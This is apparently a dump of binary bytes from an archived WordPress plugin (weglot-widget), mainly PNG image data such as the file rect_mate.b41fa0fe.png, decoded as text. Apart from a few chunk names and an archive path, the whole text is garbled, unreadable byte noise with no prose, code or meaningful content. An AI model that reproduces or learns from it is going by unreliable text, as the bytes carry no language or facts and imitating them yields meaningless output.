�\t[o������D��(��p�/�cB�P��/�P�L��'ORP�#�y�����}��?�*p��h�@�M�#��%����i�#E��a�B�G�c��8�e�?x~'�s�*)�')4�u|5Z���o@�!��.�6���eT�Ѱ��pw_��!�W�S�o��@��?@�'FƓ��Ep?j{���C9��9�����sB������R}�������,594���3GLpS�6:V
�7]GO��w�v�J��ܴ���e2~;��2�m������	���+@p3�����G���)(���K�Ԓe��+�z��|�:\�+���%m�K�p����l{��t�~��z�@��!�?L������C���n&��������s��m~��kYjn�-�nA�=�m��T?K�a�� 㷣����Z�nJ�D����_��D���Yj��\�=+��v��ʊ��Ep�8���	%^e�I!�o�m��^�_����u\�|�G����^��`��
������Û_�I��;�8��E�P����s��"��(�܉!�߀���)L!R���F�zv��N-ވ�ܴ~d�63�*�Q�[��w�*�G��ݏa�	p��>�ʳ@pǸ�w���e2y��g��ߦ��-�l7���ߞ�b�A�
^q�KF	����?�(�-� �'o�9��ʀ����Z�6�y�pS��E�o��m�=��mڟ��&"��	�>��4���9�/�9����9���4!�ѕ�g//�Q��� ����Y5�c$w���/��K�S�k�#i���oc���l��~�ܘNNF~���R�ⷃ��CA�A:c��'�GP�h�=��Ɏ+�M���Gѡ�'	�oK#�hv.�m�/1�x��k��v�1��no�#��M�9�a�@�
Z���C��q���?t<F�w:u&�]�
�g��) ~n������C��]q>��P�
j�P�L܉"y���wL������6{�D�l�ⷃ����C��B�ۮ��-���'�ͧ�ɏ9���ʯ鿖-{-K���wϪ$+pg%��O����4��Ͽ�x�YwKnC`�q	����߿������zO�+p�	������Oh��Np�Ư�#���9���sB������Ep���G��*����ۨF>�v�'{���J��܉��G�@�6���m}��]���_��>�]�P���Wx:�̭Ì�n�� �m�?:�_����<�'@������}����p9�?�n�=sn{�~��z�@������p�yY�B�m'�˒�a�j��^�_�r�sr�=�|5t�����?��mn���k�A1�m�?�o�W�;ѭ�q��;Wp�6�|r^a^ZyI��������'�xU�߆��5>��ܾ5�񕬶��A�GrU?A�P�Q�g����3x?�����M+�y#h57��Ls~�o�ڄ����]�dž��<�����E�.Q����g��?��0��?�>Yw�qh�i��p�zv��Nt+>��v���m�?��(�G���ƫ���B�#�����קPy��W�?�9���o#�A�v��W䩨x�'淥�$7�*�Sr����$wJ��}�OpDŽ��$��m���P�	�C����o ܶ�8K�os쁋o�O&�Jp���	}^^��K����U��'����v4�����b��],��KmU{���e�ڋ�"&8%�e���1/1�o#I�o�y��og�+pn���O�_':��A�A���N`�c���0{���|�0�Q���L��o�?�Y�9?;�!�K|s~�!ϲ�-%y��	���n�(��>��'L�o����5�<z���?�
�xycH���f�[?��}��������2�w,?�f�/�1͒z�>�˗�}B�}�I�t��j���_�p3�Y,�O�	ݞ��'|�ǷY�l����Y�*�2~��-���noP���K|��u}L�ͼ��f�3�?@�WR�~�e�=��C{�'���������n���˯��g�>�O&�-�O�7�~��k��d�>���BoAK`]��όO����
�6�����7��6�Ap�'R�Yb¦��lg�͌���W�S�o�u#����ڏ�T������	{\�	 ���T�7p}&��<$t}�����P���ߡ�	�gȴ������ӆ�Ǘvr�.||��1&�-��j�m,��vc=�(�+NN�G������p��	�?t|ͩ�u8�bC���n�x�ߡ�5��	P��h��O�=<�?\���g�<����U�=��:>��G��;�=����ܞ�3C�o@�m��u^�'=���Kn�֏	�>_-�����������/L�ە��L>�ͼ��Ƿ�Eq�WL��%���Y���t�=7�*��X6��ܬxա���U|�O���ݿ��x��b��ͺ>�?���3"}~�o�8~��#.����|&�7+�����V����݋��r�|��Y������6ۦ�r�	��}�`J��#��T,�/&��?a��;|���mn|U�>�����U��|������S�<�d�3���y��������j�O���fȿd��3I�����B�'��hhg�B�)~>�Ͳ7(?���o��
=��+�?����ufv���6�b����$����������^J�y��Ĵ�jo���
���nW���'����z�K��
7��3�o�5�M�;;���o#�[\��7~��"{���ޑL:�^���y�a��[��S��7y��&[�	<{f˓p�
&ό`n�FΈtC?/���#8�p�����#�
�xY�
{`ܫ8�y���1�w|��xa5�����9�7�����|����</������͓����3X��<~��ɛ^F>�>9�W�I8��g�Ip�?@��>y����n����o����+l,�`!۞y�6۞#�����e�3\��<��7����^��ѧ#����ۃ
�f�/T~]�7���/�����]�ہ_�J|�u|�4@��?|��kx����wY��^s�~VkX�K�4�\��݉g��{����o�~�3^x�/d�o�D�x|N�~��n������?�`����+.ݱ��w�.���ﴚɲ�e�g�-�ϊ�m��vg=�����%�
�f��_�����#����ti�]�y�O��O'�w�}>3h���r�`�\{���_�x�Ɵ��'��i�c���6��=�W�<~{B�_"_�u~��k�u^�'�G��/�����{�E�=C=~~�� ����:�͹�Z���8Ky�����/�����;�W�<�O�y�W��=W�?	|���O�E�=!�
����p3��/���=���ׇ�O\����
�}C��4�g�G��1�S#�>���x,b� �,�{ED��(
�6�m�~ޖ�F�	\��IH5���_,��´�w�Y�÷���8���u���G`�܏p�?h��Y�B�1�p��V��p���O�V��������O��zx�B>����m������?(Ƈ�wPͤ�{��o�y7'>�3�x��K��@�'�~��6�o����q�7V�ۥ�������O�p���O�n��cxl����}�������y�KD.���������*��c����
�۶M���܃F3�U���#��l�f���I��C�����0���1����/%<;��?��R�K����&��1�p��vK?I�Y�6_��̗N��D�a��s�/=�1�-�k�`��r�}�10{��I̗&��/��z�h�K�ã���ϒV:ӵ���x����0S���ݲg��)�"�_r�?����F��O&�
}^���_�,�ݳ��P�Ld����@�O�n�=��~�g���p����s�^+�_;�Ϳ_���������K�|}:�v��o?{�n��B�������
��/����U�7�Y�[�����9I�����H���(����Kdg�Ȩ�,�ǟL�{m�{�	��k�������Q����9{֮o��f���W���N��>��k��C��O�<s�].��p_/b�ߦƗv|�A�����gU�_��Py�^A��n�����/����B���W������߁�9�ن��������)�����h��u|���?�=S��a���3�y�y��oC�����Oz=���,�׏^�_������8x~��.�g�n���L�{]�(e����d~�����R�d��;�W�<�O^�1	�$���<��>�?�eទ�K�g����3x?����"��L�7?������cC�a����n����mغmܶ.̝�h�P���T���h|�n�	�>�ꇉp��W%5��Կ�x2A�/t?�Y����[�B����p�t�2n���1�p�,����������n~|;��oOr;���_��m���5��Y7�ޠ�L"����_����y?�y�~��SP���l�
p�7_{���x)���7,�{�k<��oF�/���~�W��P��;(/1��O�q��0���z��r��w�*,���_��|�}\~{�@ޒ9�V���;�!�l�������uD��OTǥ�&�7g]���9OuS��#F���}����#ܳ����c5�<Ki�[��>d����_��i�[|��m.���}a�w���k�<�mv����[`�@�?�6��f�~�d��Ɨ��j���8T(O#m�by��m7��ORv���Q�WlU���<k�4����Z�cǷI���e%4�-��!p��?�I�/�����c�pOhϽ�����n�&���|�8���f����O�ۏn�-�_����33��G��n���+c<��X���c�0`6Mp��L���;)�[�ρ�����3@���P��>Ѿ�(/4������4��_2����4��b���d��ݴ��	�gΊˈ��ᾃ���b}Ɨ�d�U�׀�4����w���z
�]X
p��.?p���/t|A�o�����O��	,���M�C�������Úq4�-��5;h����/���:9��[<ޗ�����}^C��1��u^�'���m�dv�/9_{z=����vy=8q0�~m�:������Q�@뗷lw�o�|2���
������Krտy�?��!r������/h<�7��W��C�y�A��|&	p�����ݎ��a-
p���o��m[�?3y��'���i/ry��x|�����n��H�cC���e�6��� <^��G��ݏp��'nwקPy�F�]���H��]����3_�?2`�������R�`�	����;�=����z���d�mT};���?(�|�V�Hb�6�[������zʛy�ۀ�S<ޟ�ǧ�%������^��:^2��fU�.���?ob��g�&__��O����>�6_�+�r���$q�^�;;pmv���<�D�}O�T�+a
�p�^� {��`c`Ԕa��a�0�R���\�M�/�?L��0y0���<}���)}��O�|��=?LQ�yI剙���Y9-�,��Vq[�	/`1֠���ʟ�B�G�����+�m�<�����3�ϗ�?\Şa��Կ��l������)3�����*?�Az[��$��@��Yv�&p{�~�1�=�M����>����*��c�
ׇ�[������c1�↓`���Fa|a�Z����Gn���7�>�����
�������N��|��gc���]�'�����h4
��Ͽ��� ������=����'�p�� ������{���x	ܿ{�'ǯ<�/|}�>t}
���	�g�J�p�m���E��t����y!h�u|�3�?�?{����G�n���_N�]��0^��w�>��w�?�l��0���g�|��;?�m��)��n�\v�A�`�B�4��:>��G� ��0��CI�����x���:?����������o{�ρ�5c�׹O��/p�3����ǁ���g�~��� ���0�������FO�j���K�g�����Ͻ�CV��|}�u<�@{��o��}����g�ϫ�܍?a���h�
�/p۟������m�~�W���:�?�W��|�����t}
��er���?��M�����/�=�p�?�H.�����:�o�n������r�����h9X{[i��ƟP~&l>�p�s�	�WP�=��-o�O�v
���p›���^�K�~�n�T�1`<��l���Wm}���|ܿs�K�+��������
��i,|{Z�ZGV��O��@���MHIY�&%%��ړ��'zĔ)#����:`ҤC�T����>w��~���M��曓'S�'Q�'�3y����B-,B�?���G��[�j��~��C���>3p�O����C->ҫ�P�Ò̟? 	jo�^]j�P���G��w�*?�W���+��G&h�$xv�P���?�<�HAzS��#O�->)&&�[�_���g¢E���RR<{�}�����������g��*���v}��A�	��@��'j������������E�v}�x�O<�����z���/�ȟ�/��x�o��ԧ_��P��'��y<(>�Ƌ����!�~��#�ӛg�*��(ϐ9z��?j�?�6 ̫�5p�+����������G�|�5������/��{E&�M}��x}�z�����������_�B�`�.��4��z����!1Ĩ�Oyk�P��/y_��T?aQ�$F��Z�	�PS��������_A�S����B��P�������od�~�Ez�~m�G^�'
{[������C����Y~�>��6���'���Z����_}�+b��mĭ����38�Ǣ�=̏A�
���P{�x?�o�:�	�߄�Gx��w�~tB���X��-[�+ɿi��?
��(��,LJ��ۯ�G�O���+�����o��)�"ߞ��z��@�+ _
�<�h��^�<�ӟ(˯��AW�޺2Bl
�H�{��!<3��	���~e�GO�q{����q{����q{����q{����q{����q{����q{����q{����q㴰�f���٫�=���=n���=n�����
UwZ9�
��~c�J�O:��ȑ/hH�����#=�Ԡ����v&���l�zX�"IEND�B`�weglot-widget/build/images/rect_mate.b41fa0fe.png000064400000146726151330373270015656 0ustar00�PNG


IHDR-� >NEg�PLTEGpL{�GX�c&&&9g?\�KU���R?o�v~У�1�bPq�{���5n����4m��1�F8G�Q@��W�c&&&"��]�K5K����0o��o-�L;�1$�7Q܅|��ڲ�+S����{�*�]Q��P��=t�������(W�J��w���Jkkjہy+���6(��
܏3����붰�L;�X5�RE���_����������n�|���諥������G������e�c�l5�mc�2���♔��맇.�g\��멜Yk��30*��A����|5���̜����0���^�ԿM>ߞ0��O׵8�eC��颜�ON�[f������wa�`�]�����ӳ�f��Ds��s}K�F8�S\�wn�ӭ��k��թ�=`.'�����ܢ��ˌ1�2ѧ0o\(��._a�ƴ7�ۏ�q/|�U�C3v���ں�~N�O��@�FɯK�	��r��у��{�E���ۅ.���pr��x��( ���Lx�����?3�`y��Pޡt�_=D@,���ŵww5*��rWG%F) TRT~�J�>CC�t3���`Û�`Ŏ�eSٛ�*Lz_���C5�<��Ezʄ#3̳�0��Ef����\������~5�v���Mf2��
�ҺV�B�P��W��l�)�ȑyTA>���O����M�_�4L�&:-�"[�^,������R���r�
��Z�ݵ�����}tRNSθ�V���Ǹ�ƹ���F@ʲIDATx��[TW�ﻞ��y�y��JE���l첊jX�@������;�&F**P� B�	�"������[c��՘�<��ի{�%�;�jVռ��
Q}E�ʬYc��;�7��~^�g��ŕ�7z�i�Q��W��pyw4�+O��Z�i\��6���9H��F�C���4t�h����l��F��[>'7�����fuX���o�r�4�-ôęO�9��|����1���.ny9���.����e���n��?�Ϭ�o]~֯��4��>+JN��.��9�0�;��v$v}q��k?�fy���fy`~���'������[���j���X�lݿX�;��G�Iy�s��j��1
��p�oQZﻉ�Uq{�E��#M�E~�P/��+��˂�|��b�_b�7.�ov��@�iL���p�PA��g3b��e!��ߗu����N�N6��t���N1����k,_(��aڿ`�X�k/���le��?��:r�@w���
�������'�d�e�?/��;�,>̓2�'#o��[������������#n��:��b���V��φ+x��4���c�cR���/�i��
��H�;�any�ַeN�/����s���8G����[5��p�����a\�u�4ҍD�8;^��uE߷�:~a�K���`�qi_��x3��_�_ߚ[��܌�ꅴ�o0�o�;܀�~��ʬ��+ý^�"^
���G�����X���[�>=��p�Υ��G�8���3W�o���c���|�ʠ^�+�}9����2�|�R�o�?����b��{}q�k}���p�<(Hn�Z�����&�j��&?���V~OJ&O�D����d2�%e|����c���O��[?�=�Ͽ��9?%���ˑ�w��|O���c�gG�Wxgs꙳��G�G�2�Pع���9V��?�'���������g)}�XBs��A�8� t���m�dbAR�� ���#_��&�,�홿C�s�K+
��_��Fp�w��?-��o��S��zLík�����n�1G�p㓎z?��{|�w��"l��ջ���<�Ŵ�Z�7�����+�~�w:����[j��V�lP��'N2�Ӓo
�*���eľ�_U���_��W���v���ȷb��v<����WbV��}�(����8�.?��D:�Z�~�w���
p�>~n}�s�g�ܯ3���Snٕ��7?�-����{Sn":I8��>�`O��5a�����2
�G)p+��!(c��~��[�%��̜{���q�no��p�*�uon���{� S3
�%p+p�a�>v��ê�x7�{�ޮ�r��ލW�p�1���N�1������-�*�j��
�*D��P�P����p��f/����� Z�3���UaZ�$/�7�vs;"�>@�����L��mmg��jl���1	��iox�z��5!L����!^Ѻ�p�Y���7>��-��2�;
��&�d
��
O��⶯�p���q�a�AAK��+Gܸ�w�&�y�a!I�Ҥ�0����1nEZ%XH0A�j_=�{o�[K�9^�8,�_3pk��߿[#	����_��]?��OI;��o�7e��7��7"p�����T����(��g܄nT��F���b79�=��p^U[���/�7ʁD�����R�6�o���w���+���ܻ����w�ܩ�H�\�6p���[*��إ�lQnJ~Po��/?�F"�@<���B�_K���ն�V�������}��s�	��:~N��Wb�p�G�~�n��8�h̋p���y��kpϋ��7&��Xw�Ф��-t�s�[��n8�0��1s�$��n�K����m�m{�ބ��7�&� AEe�G4Z��L`+5%xp��#�hKn�;#&�����8�ti�.�>+44�;�p�-�]:7�<�ۭق+�tg��>o��kpC������GV��d�f;nߘ�����~����
�c����
�/o��y�и_�0!^I���s,�,��CH�p����6:�&�,����|:C��ne]oBQz�9��con���2I����+Q�B��R*]3J�>�UI>��+O����
���|�,�������nn}�Tg��fL�� q��7�vK�+*�M+s:��vOPIg�ً̛�hL���'nA����x�����s!�� f�ˣ�Ggܭkָ��v��UK�{n�b��w""��7�&
�$�E>��4�[�D9���}�4��I�����nd�Y���G�Z�7O��p�^_�|$��!I�*W%I�[�J`�p��BX����������U�-�Q�$�����h���$���?炋��7~�����O��3��6��ܯ�=������p/�$�p�Y�8�f�o��p=,*�3��pD�H��@h>Q��sM�e9ަ��{zFI��r��q����3�x���mۆ%��ܸ�yG��Ͽ�=�R�ז��{`�[#�\���ߣ���?���,	�۰�]��O��6�y�Hh
P���� ��r��m�nFY;���|�*�T���6(v����f��Y��\��@��r��X7��x�"yt��,E���5�8�>���D:�G�=d����]$�o�pW���SʄS���&K״z�[���$�m�~i���&8/}�\�K�{i���9�m{nrit�p�j���e #��@���������
#���
�
�۰]z*���8��]�t=<�<���^5�{��"܉���aΝ*����K�.�'don���&I^�n
X#�h�ۅ��wg��^>�
�{��R�}����s�{���^�%K'`��Kղ����'G4��!`�p�p/o���;�Fa1��L��l�����
p��
ܧz��IhG�7__��7=����^7��.��e��#��A;��>�~b������-�j;{#��l��%X���,���}������j2=��1|X9��<3��4y�AwL�d��q���9�U7���Kf��ߥ0�4�(,�k_{���^��8X�q���2�qWZ������D
):E��|�@����[۹5k��;���^D��;R����b�npp~P�xS�hj����!ݤ
��3���}���B��!�+(�T��	wK�Gl�8ќw�LfX�7O��(����l�^��p��k��k���r�!½bŵ2�Y�EB�j9�Kඔ߶ம;��\]z����?�⋪��(7v��k|���f�7�dIY��~�n�2~�z������nI
ܒ�x`�o���,����P��P:���qv	�L]*pU�ڶ��bs�t�{�2����,i�޽K���_n0�%pp�H#��#�/��W��w�}�����_���߻޺}�0��a{�,�?�AJ��p�-�l���o�W �����JU���K��rQ�͈k����g���6�����g�4��}|��B�Z!��V�)V�X�8"�b+����Y�
�`M�W�I�z����s��2Ci�������e��K�.�H�(���{�;�Q:t�����-:�����0�	6
w�K��T
��}ƹ7��������o�p��Y��Q��������h�.OR�/�|p���JQ�%�m
pgĠ,)�T�\,��ª(���onk���k��*d1��no�%
po��_�;"��1f�
�%�����gg9�m�=�
�^>�
�/���ޡ&�W�}�X%n��-�M'`�D�x�K��#�pD��Z�/­�Q/���;j���=zt��A7���LI����U��y8T�9�-�.آ�n)����n�:YoF��con���M������b���F
�tU���J�Z��~"��x?8�F� ��=�-!�kg��ǝ�(��Z�nӮ��J]UPU~�6�L,��e5i[M��
Ûp��IhG�-������L��n��ls�n �0�c�Z��;&�
a#Б�����a�|;(��$�i�ܮ�95�Ny#��CP>V�K��R�G�wG��=�$���E�E��e�1��w2�,H·��w�Ӌ���"�Q��7��6�NF�Y4q�CyGٵ�V�Zl��4>>�+hÆ��˗DR��D
�iV7<�^�aK��,�xחf�x�#]�;,�#(X|�x�tn�����QѦ���V�j7)����Bn�;7ҍ�5����	��9_��V�87~���OE�E�֥�K
�}c?���sUz�"32"u��iK	�W�Nܑ���d��h�fq�[�
�����>�?��'^��p��o��g�$͎���tcc��F7[�-��y�xy8/.g�s��^�̥+:8�_��F��~�
ܪ�$���%½�Ώjz�uk��[�>i���x	G��Ͽ�=�c�>��#�C�ô�ޣ�q!�{�Ʒ�{����gI�i%&�����o�܂,��e@�aC>����_���w��/Vo޼�4 �3��h���|$ܦ�^�:��||a���ڵ��^x�����6khӧ%"�`�%�-]���rR'O[LdAA�;���	b��_��{��;���{�)��vpp�!���5��D�m{n���p+�#Ӌ��l-�& �.�:on�w&og�������{n%d�	����}֟8�.��ܜ��]74ޢ7�N�Ei0����+����}M�gC��-�m	p��6�:"��v�q����<�XqG�T�ۭ�M�vh���ܼ����^<�[y
���bXN��Jׅ�}7%��Z�/_>�ow^�l��Kl��h������yb��wd����W�^魯]�=N�m*�
�v�ex���j	���
G4˴̓'P���G��b�X�峾G��{�}p#_L
�-���z�U��@�9�-�&�}��:r�����y���[��S�i4jg�i�II�i��'��n�O̯�̯��;q�H�zp�1p��@�	�Me
#��Fx8�ۭP���O�y��O�0�+�4_�W ���y���mm�G�O��<�AX�@�I
1�wQ!K�޷��wlW$ގ�+f��5��&����}nٕiwtR�n�,�P�D;�ng{��������������6���w��t��&����E �?)ZWO>e���Hˑ�/����{�@K�{�5�)n	�k��1s�-]�{�njM}�R2�m�Ljs�+Oz��0i܊�w`����w�X�bz&<����[�	��r����Op�'��t�w���J��a��Au��>�(D�\-���Kɝ��!2:��i�ί��Q7�eڬ^<A�wT|pM|p|f�W�7�nR�;�w�"[Rw>�]l�����,�:3�@�<7��1
��T?}zEg:p-b�c9?��?�P���Y,��~��nW�;:R�^M�����L{nKC##� ��
�[�Y1ɡV�<�]����sr�2c�w�_��(�S���R��6'��^'�/�;����i�(�-��^�Ip;ভ�_�[�EH��^��W��6d���=޴T>��3�tA6A���@�7�YY��f�Y�	��|�vʪ-��w6����.�[D��_9�8"ܶqUϴ��{��{��R3�GF�?�qd���	\^�Q���p���[���7O��V�4Yq�ԔU����6�ٟ�n��7�~�p��kG���7}~�UB�ʟ�nan+��C������8���t��196��s0��m��J�7-�����EN��9_D1�;����z��9)�6��ʺ��/L�n��~�`Յ�<Rٶ��*��M��dn���|�l�[|���;�L[,����ڑ�p�;j}�-��u�er���/����pϋ��vܲ��KI�{>!մ��b��
oˣ�o�a���$���mZ�f��p��,1���;&�m��1w��ܒE�_[���߶����D��C��0�k�I���~�J��D��8��-=��p'�E�-��R|!�F���:��?^�p�K���pӫp����M�L�͝�v<��	d�Ԭ*���И�&�n����W�N�j�~p/஦��ji	��^еus;��[����D�d�P�~8�p?|��>n-��+`~�	���V�e&*J2�S�!��PF rKr�Nݳ���Mdh?r�'���I\��Y�' 5\"p��Qh_B�^����x����ƣ�c�U�z��7_�B�{a��ܱ�e��ݳx��d>ev
��uC��)��ݘ9s�9�e�i��5�\�V��Lu�?�iwso�ݑ�Ċ�ʊʑ������;���Wf��v\��F�w�w�4�L��nw�݆��?���n��
T;p>b��om2spt��Wפ}������[v�>����x|/�:#O4���K�v,���}�,�H1�vElcN����,?b�&h+���e����H�q�[&�]�W�^h�����Ǚm8�q���ښ��r��ie�b��s�����Ν�ƚ�
p�{�I����|�HqsK�[񑖖��#+��׬9�ݚ5�g�e�7SE�(½H�2�VB��+p3�U�O�u��_��ta܊���A�YEQ��p�C�z��C�.XPUx���i���p����!`���#3�p���ɓ'
*(>>��4��ܴy��rv~���p�^_��郍{$YTjp||p*.�-Y��f��,I4�*�k+
p�_,.�M�o�Ǔ�d"��S��Ϝ�����V���"7oEl.ק���џ��b���������q���M*�
6c�]㪖P�f(��
Ud�*H]�z)w��G|>ؽ�Ecc��o3
�F^[�[/p��L�|�3�5�iS��:�����Ij��J�����C�>3���z�!	�p7�5J��V�燰I/��p�{��5�i	�wFtCe	Բ�mϊ%�]�����%��a���������|�’B�	p�l;�y&��K�UQI���n��z�![r�J�θ,��qU�T{-"��B��J����>o�un9_iz��t���+	�W(p+w���ś7��Ep�wt߻W��̢���N�EЧ��t�{��i:��A��n��7<e������?p�p�WA���椴������ږ߹�?YA���fCXd����s0�-h?Fl��aa�p{��[�y�fO���z��#���=���-��nx���DD��;9_������}�	g���~�`�
�-,�}��͟$M���.����u�
(/<�Q�����	"��m����YZ��JW���/
�_�K� -e��H�߶��]B�2���E�1��p֎0!�.V�W�pK�A�;s;��x���"����m�����v܉�{#R="B�(½��j��<��]7_�
�Y��&�l�~:��nߛ�O\���8�.?��L��!M2pܒ�H����E�Y7�o���B<����H�$�7*�T�7�75��.{��đ��D�q�
���f�fB>QȄ[�*ێE�9�=Н��[�p�ІZe�l��
�+���ga���t縬s\��S��׽D��UY/�#�+po�~���4�	{�1X��ʌzj�"�3(��i��3>Z̆��O�	�:�L���yIW�&�Ś*tr:��28nd���|��*��M�������~}c�ѣ����&�?g��\a�~�O�i
����n	��NG�P4/�u,_df��2�ہ��Å��x���B[mp���mbb"1q����ƍ�
�0.[=��(<�JH�SO�燒�&/����17�I��Ϯ~��j�z���̵��>.:r�mS˦���|�3+Ye�>�X��Yi">���8�>B#����W�s,��͜��8�
��i�����{M�(�����A�BU��Q��F7B�����"�n��=S���d{Xm��7����<k�5�J�u&�l )Mp6�-�?���K/B�^qJ�^��HqKs��+���׬���vn͚��N�%�p/�w�^�<��uYv��'�~��/>*�[9�N�n齃�7�&�����u)��P��`��Q3bW�+�'t�ڲܲZ�t��4\�{�����x9�!5r�[^��kR�_*���/���!!<�/z}����������+�)�<�<=��<<����D��w�p�5$/vł�F���)�m��~Ԕ�v�[!'��9���a��ek��!�cW����l�}o�n�ɞ�����]���t����u�
J�H~�p+��d�2+�5��C����bwtww�������Eu~��^S�[��ǻ`@Yd·�����n�:�5�O�]nj����ɥgv�$����x?ý��^8����M���M2�1�{݊}��o7'4��o}��g�4�
�Y����ٱc�?媥����
�ǣ���b�Matk=��d��ƓEnƛD�f5<�\\�GI.4B��_4i;3vɋ6ȝpò�^��QF��}�wXi�$�[n���	�3KP��&�/zc}�H\�iwOOO{��r��'[3g�>������#O���n~��|���<]��S�Wd8�F�ۏn"�[�pnk��֮-n�R���7��� ��j�Z��3�;ـ�5���ѫh鎕w�ݱ��uc#��6L��O����S�������Fs��gl�H�{C-p��j�p�^�·������&Ҿ4�pGm�z�_��2�oifu�?�ѣmJ�m�\y"��~�?���kE��k��E�n��ZD�P�|`pK���"}�sW����H=	�k�Bv�.�.��e�rs}\|j�s�˺�\rk]j���
��-�*�tUp��"�E�|�r+��y{||�=5	�7���#8**�C��м~�N�[vf��u�u���SZ�o'�����Ų�w�'���������q���gX4���b��V�����Ōb�	p�Wlu���op�)����p/-��a
�|�66�-ԧ:b��n�pU��@��}��O��ϳ�n��=�&0�$'G�
�1$C�(��$��h���ç)���Fr/I*�6�1(�V�JmY���LV�2�	pϑ�����V���'�p��	�hj��������0ή�����4bQnۓH�?�<��0�	�ֶ_�to�?;]-�(��iQ[������~-n��)��>{�Ds��j��T��Ѷ��˩�����V�Ψ���G��ȃ���6p#1;گ�,��z,E�5�%q�%`����eL�p����V�S5�b�-��-��po�o넨z������#���j�$��"�~���. �n�5��R#��(��fy__����&...00�0��n5q���f�='9	�vs���w++**��oU��M
U���h�@��o�P��
��!��b�x�a�v��$���7�f����c��f~[Z��m�?��vo���d�wR �5�IBר4ߴ�L����៓�������Jl�Cn��kGf�w��X��8nZ��L�G;�n��e�
���O!�����#Ԉj?�-�ঽN֨��i$J��=ز�BL�RR:��	pG��[˱�*zQL������G���5%���� v.%�q'ܒD��Vp*���?���럸|��������ݯxGX���XH��1A۵�n����(����Paa�9��� {����}С�jk˺�ju�3NV:���	�ƍ�
p�l8���%S[\'�lw���
��.��,�;$��?5�Fn�������Tr�?������O�p�e��2����V��;zR�;�x(F����'�?�S�s�~i��1$c�nF~��}���vB���^��Z?�[�;NCͤ�宸Fɑ�/�.�]t��~���B�ߦ]Ե]-�G���ˆ��>S�����:N��Ӝ��`S��w�Y����o�Ώ2�?�����V�Jj����53���ю�����~�~����tG���r��B
���M�N��R�;ý���4MUEEU�H���z!����u<A_Eq�UGE巋��-��z�]�l�$����#5��߆����cG���,�����F-��&	Fn����M"��5
6ie�[��t�;���.��F�8��k!jȽ����ƒ����<A��ʒ���K�C���7!w��POh�nR,>�<�����m���J����N�U��� m�����dd��^��j�܋��3#�gT����Ҳ��}fS��&�Jğ�k�]#�]�c��O#~�����n�hoڴ�݀�n4E�z���wa�վ�%��J>O��i����z�f��?n	p�oz�u��ɳ��7��`����w�n����Iuh2P���H�^�^ygv笨<VA��덕�w�jQ��KC�/�����d�{�޵k�V��0ġs�
�U0�_��tA���`B����@�;"bpz�m�,�$��t�uu/L@�O����yD��m����6�n����Q_�c
"/��p�?�|��-��+B�kwwwQ/��X��
��i�]�r}������>.y�e�ˆ��ڮ�\@Wk �����;��ߕ�k!��R�t]��+��1J
�J3xx���y9�.��o�pW�{_�-��<���a��V{=Hp�E�����"O�p篪�D���;I��a���dg�^��RE�PE?�(����M��������������տ�78IvoYn�<���i��uK1A��^!��ׇKJ�P�8v~LNԣ=�%�mH?��"�7��H�;���1��O1�1�E5�Ɇ��Me!^������J?�*Y	A�ӎ����#Q��*'�hWCch֘c(��l
��y�����30"�g�;'�G�>�����ϺO�O��3�w���G�
8�)SZy
pnW����a�y-g�ܞ�w����._~(
p��>�B��.%^6�
��d�?˄܈�'�������<�D
M��Hm�@�IͲ�-X�p�i�K(+��Ǭu�|�n�XoU1�.>��Uc��$�������HR��
����gܡ�-a�V%[�܌�(B�w�mo<�N���k$��Z�Dj��7���c�1,޻Q���
�o6��ⲁa��h��7,ub�_78�vK�N�lJ��||��ĭ[��1R�	]m����������FC�#��r,���
SB�$���*��3��#z���!��d�� ��m�;Y��W���j��ba"�uƣl����v"���Ls�o�ܑ*>7�^��5�}&�F�&�٤%Pn��0q#��ֈ�H�s���7p��;{�Y�����v����;::Lߢ
01q˕�H|;�-%E|�-n�[u�h���[n2Խ�����X����^�Cc��f
,1H�p_����n)"�<Ŷe�n�{��C��\����!<�[1X�;�\����ya���1��qL�R|��n�CL��q��̮xhfT�(Ġ��?j_�
m�ٴJN��ܡ��Z��ܲ���!b�C�0�΍O��ǟl��ڽ�!I�7�$��	n�K�!�mW����+�;$�?>�~�p|��%�!i[�
pK��Y���"ܥj8����xol�t�������
�B*�d�v(�Sʴ\f�~q���-��B�H7#�MZ";����b[�����:P�F]áu�w���Cg��2]q����j�>��?7�E��o~�S�볘wڧW���SŰv
ְ����f�n?��[>�Uǻ!�=����{�&��R���IM�e������B�Z��O=c"甴���	n	m�O���hIHp�w�Nٮ_��ۉ�#��c�
ٜ�rL��{_Ϟݻ{$����6UMNVm�;}�w�wF2�=R���M���-�Z��X�p'v�H��������kc7�;{.WY�mQmn��>����ú�+��H�n<���LXt��b[s󃼸������)R�ڈwnnmmW-2���<�n��k���#x�U�F�R4&����N��M�}o�h�#���K^a1�w�^I�o�����2����&p��rJ{��i��B�rd���5���e���Fظfp#�vC,�?>�q5���h?���
��!���7$WL��q�+��+~��z�^���V��p�}��ŋ?��3����akfDj����Z$�ݴ��w눲��k�-Y�W��G+���$���l�׺�p���~%�MW��fܿ�m|����N�����f+�qm.�{%b���Q�$�!(P"����?��=���b����Ċ�9�������K�����^�Tk�����f�̷�>h�oׁ��m�7%½D���h�����`B�Sw�;�q��H�Ϊ|�?��f>�����W��[۷vUj��[��*ʽ���
��p?ش�D�mn	"�V���W�7#"�[%	�r�}��DB�_9��p�(����	ݒn�@g{�<7�|�k(7�+��G[���R�̥��Zܓ�!j���Vc��'��m��yTk����9�Y�gϸ_�1S��xO)f�}|D̶�U0"ŗ��8�B>��)�͟Ɠ����b@F��.����95'��{�+6�Q�b�tj�0J�\��9���{�rq`�o�t��|��2�g�p�i����[{����.��e+�E|$�R��xi���vo1fQ��	�8L���p��ۋp��d5�%p{
n{���0/�D��Y�O���q����Ƿ������p�?����?�����'�[�	���.���l"B�o��e&��sn	OAq��i��nZ���1�@���Y�,k;��bB)!5��t!��Y<��>�:��io�n{��(/T�����v'�Ԕ7��4R��:�Z|��`�	L{	�y?��b�7ny&S�B��݃[�����l�EZ�g1��
*p�JpK�:��Vl�
�
�-�>� ���i�7n�����"p; ��{

����=+p�?�����p�[��KWIo��.�Q��+%�����Fdٷ�$�J���2u��Z��*
���c�D�,�7�"�9%%4��Z
�xkzϨ�W�{l̗������	��~_	�5�~�y���-í
�6��sG�1΄��(U�y��"*�u���$�v��nh�鈺��:���3�NQ�[-p[S�.l.��6gJZ����/��]��r�]�8р�*��z.�;s;�w��2InC�=r��d�	i�i�<I
��f�yC[:����K0/y6�f�Rݝm�|DoaY��(�L�b,��=nkk����R4�t\<�U��-����L|�yA�D�ZOL����^�V
